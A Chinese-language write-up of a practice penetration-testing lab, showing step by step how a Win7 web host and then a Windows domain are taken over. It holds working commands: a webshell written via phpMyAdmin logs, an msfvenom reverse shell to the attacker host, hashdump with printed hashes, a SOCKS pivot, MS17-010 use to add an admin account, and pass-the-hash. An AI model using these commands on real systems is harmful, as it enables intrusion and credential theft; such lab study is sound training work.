红日靶场攻克笔记一
靶场拓扑图
 靶机环境分别为win7(外网)、win2008、win2003
 靶机环境分别为win7(外网)、win2008、win2003
win7:192.168.100.101 win2008:192.168.52.138 win2003:192.168.52.141 kali:192.168.100.246
web****渗透:
nmap扫描主机查看端口服务开放情况  发现开放了80端口的web服务和3306端口的mysql服务,对站点进行目录扫描
 发现开放了80端口的web服务和3306端口的mysql服务,对站点进行目录扫描  扫描发现了phpMyAdmin目录,访问弱口令root/root直接登录
 扫描发现了phpMyAdmin目录,访问弱口令root/root直接登录  进入后再sql语句执行处检查写入权限,发现并不支持写入
 进入后再sql语句执行处检查写入权限,发现并不支持写入  查看日志记录情况,发现日志也未开启
 查看日志记录情况,发现日志也未开启  使用语句开启日志并设置日志记录到php文件
 使用语句开启日志并设置日志记录到php文件  
  再次查询,修改成功
 再次查询,修改成功  写入php一句话木马
 写入php一句话木马  蚁剑连接,发现是管理员权限,且存在域,判断域存在与否有很多方法,总结下几种常用的:
 蚁剑连接,发现是管理员权限,且存在域,判断域存在与否有很多方法,总结下几种常用的:
1、net time /domain 通过域控授时,若不存在域会显示找不到域控制器 2、ipconfig /all 若存在域则主DNS是域名 3、systeminfo 若存在域再域的一行会显示域名,否则会显示WORKGROUP
 内网渗透: 进入kali,使用msf模块制作木马,这里的马子没有作免杀要注意关闭杀毒软件
 内网渗透: 进入kali,使用msf模块制作木马,这里的马子没有作免杀要注意关闭杀毒软件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.246 LPORT=4444 -f exe > /test.exe  利用蚁剑上传
 利用蚁剑上传  在msf板块开启监听,利用蚁剑执行上线
 在msf板块开启监听,利用蚁剑执行上线
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.100.246 exploit -j
 首先尝试getsystem提权,成功拿到system权限,这里也可以使用cs提权ms14_058,经测试也可以拿到权限
 首先尝试getsystem提权,成功拿到system权限,这里也可以使用cs提权ms14_058,经测试也可以拿到权限  抓取用户hash值(需要system权限)
 抓取用户hash值(需要system权限)
run hashdump
 得到hash:
 得到hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipconfig时发现192.168.52.0网段  尝试对52网段进行扫描,发现有存活机器
 尝试对52网段进行扫描,发现有存活机器
run arp_scanner -r 192.168.52.0/24
 为方便进行信息收集,我们先建立一条对52网段的路由,设置端口1080,版本为4a,使用proxychains进行代理
 为方便进行信息收集,我们先建立一条对52网段的路由,设置端口1080,版本为4a,使用proxychains进行代理
run autoroute -s 192.168.52.0/24 查看路由表 run autoroute -p 检查路由表 background 返回 use auxiliary/server/socks_proxy 使用代理模块 set srvport 1080 设置端口 set version 4a 设置版本 run
 
  配置kali socks代理,编辑/etc/proxychains4.conf,在[ProxyList]添加一条socks代理 0.0.0.0 1080         代理所有来自1080端口的流量
 配置kali socks代理,编辑/etc/proxychains4.conf,在[ProxyList]添加一条socks代理 0.0.0.0 1080         代理所有来自1080端口的流量  使用proxychains代理curl 192.168.52.138主机,得到回显说明我们代理配置成功
 使用proxychains代理curl 192.168.52.138主机,得到回显说明我们代理配置成功  扫描常见端口
 扫描常见端口
proxychains4 nmap -sT -Pn -p 20,21,22,23,24,25,80,443,445,3306,3389 192.168.52.141
 扫描ms17-010,发现存在漏洞
 扫描ms17-010,发现存在漏洞  尝试进一步利用,选择比较稳定的command利用模块,尝试执行net user执行成功
 尝试进一步利用,选择比较稳定的command利用模块,尝试执行net user执行成功
use auxiliary/admin/smb/ms17_010_command set COMMAND net user set rhost 192.168.52.141 exploit
 
  添加用户
 添加用户
set COMMAND net user first yyds@123 /add
添加成功  把添加的用户加入管理员组
 把添加的用户加入管理员组
set COMMAND net localgroup administrators first /add
加入成功  尝试开启telnet服务
 尝试开启telnet服务
set COMMAND sc config tlntsvr start= auto set COMMAND net start telnet
开启成功  nmap扫描确认23端口开启
 nmap扫描确认23端口开启
proxychains4 nmap -sT -Pn -p 23 192.168.52.141
 本地连接telnet服务,输入刚才创建的账户登录,拿到141主机的shell
 本地连接telnet服务,输入刚才创建的账户登录,拿到141主机的shell  按照上面的方法同样我们也可以拿到138的域控主机,另外因为几台主机密码都一样所以也可以使用hash传递攻击,使用hash传递时要注意使用正向连接,因为138主机是不出网的
 按照上面的方法同样我们也可以拿到138的域控主机,另外因为几台主机密码都一样所以也可以使用hash传递攻击,使用hash传递时要注意使用正向连接,因为138主机是不出网的
use exploit/windows/smb/psexec set payload windows/meterpreter/bind_tcp set lhost 192.168.100.246 set rhost 192.168.52.138 set smbuser 账户名 set smbpass LM:NTLM exploit
 这里还有一个问题就是我在hash传递时使用msf hashdump出来的hash是报错的,可能是模块有点问题
 这里还有一个问题就是我在hash传递时使用msf hashdump出来的hash是报错的,可能是模块有点问题  于是我是用cs重新抓取了下hash,在msf中重新设置smbpass
 于是我是用cs重新抓取了下hash,在msf中重新设置smbpass
set smbpass f26fb3ae03e93ab9c81667e9d738c5d9:b367819c0a8ccd792cad1d034f56a1fa
 
  
  成功拿到138主机的shell,登录发现已经是system权限
 成功拿到138主机的shell,登录发现已经是system权限 
总结:
靶场1考察比较基础的内网知识,需要掌握各操作系统的指令、经典的漏洞以及msf等工具的使用。
